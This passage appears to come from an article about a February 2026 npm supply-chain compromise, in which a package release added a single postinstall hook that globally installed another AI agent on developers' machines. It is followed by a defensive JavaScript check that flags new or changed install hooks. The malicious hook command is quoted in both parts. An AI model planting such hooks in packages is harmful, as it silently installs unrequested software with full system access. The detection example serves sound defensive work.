Five steps from a GitHub issue title to 4,000 compromised developer machines. The entry point was natural language.
On February 17, 2026, someone published [email protected] to npm. The CLI binary was byte-identical to the previous version. The only change was one line in package.json:
"postinstall": "npm install -g openclaw@latest"
For the next eight hours, every developer who installed or updated Cline got OpenClaw - a separate AI agent with full system access - installed globally on their machine w...
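One check a CI job or registry consumer can run before accepting an update, shown here as an added example that is not from the original article: compare the install-time lifecycle scripts of the previous and the new package.json and flag any hook that was added or changed. The two manifests are constructed (package name and versions are placeholders); only the postinstall command is taken from the article.

```javascript
// Hooks npm runs automatically when a package is installed as a dependency.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// A hook that itself installs another package globally (npm i -g, npm install --global, ...).
const GLOBAL_INSTALL = /\bnpm\s+(?:install|i|add)\b[^&|;]*\s(?:-g|--global)\b/;

// Returns one finding per install hook that is new or different in nextManifest.
function diffInstallHooks(prevManifest, nextManifest) {
  const prev = prevManifest.scripts || {};
  const next = nextManifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const before = prev[hook];
    const after = next[hook];
    // Unchanged or removed hooks are not a new install-time risk.
    if (after === undefined || after === before) continue;
    findings.push({
      hook,
      change: before === undefined ? "added" : "modified",
      command: after,
      globalInstall: GLOBAL_INSTALL.test(after),
    });
  }
  return findings;
}

// Constructed sample manifests: name and versions are placeholders.
const PREV_MANIFEST = {
  name: "example-cli",
  version: "1.0.0",
  scripts: { test: "node test.js" },
};
const NEXT_MANIFEST = {
  name: "example-cli",
  version: "1.0.1",
  scripts: {
    test: "node test.js",
    postinstall: "npm install -g openclaw@latest", // the line quoted in the article
  },
};

for (const f of diffInstallHooks(PREV_MANIFEST, NEXT_MANIFEST)) {
  const note = f.globalInstall ? " (installs a package globally)" : "";
  console.log(`${f.change} ${f.hook}: ${f.command}${note}`);
}
```

Because the shipped binary was unchanged in the release described above, a diff of the packaged files alone would look quiet; the manifest has to be compared as well.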